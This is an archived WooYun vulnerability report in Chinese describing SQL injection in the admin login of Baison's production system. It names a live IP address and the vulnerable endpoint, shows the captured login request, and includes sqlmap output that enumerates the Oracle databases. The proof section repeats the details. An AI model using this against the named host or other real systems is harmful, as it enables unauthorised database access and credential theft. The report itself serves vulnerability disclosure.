当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145759

漏洞标题:Baison/百胜生产系统后台管理登陆框SQL注入

相关厂商:baison.com.cn

漏洞作者: 飞鸟

提交时间:2015-10-10 19:55

修复时间:2016-01-13 19:56

公开时间:2016-01-13 19:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-15: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-09: 细节向核心白帽子及相关领域专家公开
2015-12-19: 细节向普通白帽子公开
2015-12-29: 细节向实习白帽子公开
2016-01-13: 细节向公众公开

简要描述:

Baison/百胜E-Mobile信息系统后台管理登陆框注入,可以利用注入获取系统中的敏感数据

详细说明:

http://218.93.120.202:89/manager/login.do
输入用户名、密码和验证码登陆,抓取数据包:

GET /manager/verifyLogin.do?loginid=admin&password=admin&authcode=dqar HTTP/1.1
Host: 218.93.120.202:89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://218.93.120.202:89/manager/login.do
Cookie: JSESSIONID=abcCvmc3fc7A95-pLspbv
Connection: keep-alive


,利用SQLMap进行弱口令利用

1.png

2.jpg


SMAN
[11:07:37] [INFO] retrieved: SYSTEM
[11:11:17] [INFO] retrieved: TSMSYS
[11:15:08] [INFO] retrieved: WMS
[11:17:44] [ERROR] invalid character detected. retrying..
[11:17:44] [WARNING] increasing time delay to 6 seconds
YS
[11:19:13] [INFO] retrieved: X
[11:20:52] [ERROR] invalid character detected. retrying..
[11:20:52] [WARNING] increasing time delay to 7 seconds
DB
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] ECOLOGY
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[11:22:19] [INFO] fetched data logged to text files under 'C:\Users\*****\.sqlmap\output\218.93.120.202'


COLOGY
[11:30:31] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to databa
current schema (equivalent to database on Oracle): 'ECOLOGY'
[11:30:31] [INFO] fetched data logged to text files under 'C:\Users\*****\.sqlmap\output\218.93.120.202'


3.png


4.png


可以获取用户名和密码列表,由于是生产系统不做过多测试

漏洞证明:

http://218.93.120.202:89/manager/login.do
输入用户名、密码和验证码登陆,抓取数据包:
GET /manager/verifyLogin.do?
loginid=admin&password=admin&authcode=YEDO HTTP/1.1
Host: 218.93.120.202:89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://218.93.120.202:89/manager/login.do?
message=103&verify=
Cookie: JSESSIONID=abcCvmc3fc7A95-pLspbv
Connection: keep-alive
,利用SQLMap进行弱口令利用

1.png

2.jpg


SMAN
[11:07:37] [INFO] retrieved: SYSTEM
[11:11:17] [INFO] retrieved: TSMSYS
[11:15:08] [INFO] retrieved: WMS
[11:17:44] [ERROR] invalid character detected. retrying..
[11:17:44] [WARNING] increasing time delay to 6 seconds
YS
[11:19:13] [INFO] retrieved: X
[11:20:52] [ERROR] invalid character detected. retrying..
[11:20:52] [WARNING] increasing time delay to 7 seconds
DB
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] ECOLOGY
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[11:22:19] [INFO] fetched data logged to text files under 'C:\Users\*****\.sqlmap\output\218.93.120.202'


COLOGY
[11:30:31] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to databa
current schema (equivalent to database on Oracle): 'ECOLOGY'
[11:30:31] [INFO] fetched data logged to text files under 'C:\Users\*****\.sqlmap\output\218.93.120.202'


3.png


4.png


可以获取用户名和密码列表,由于是生产系统不做过多测试

修复方案:

过滤

版权声明:转载请注明来源 飞鸟@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-13 19:56

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价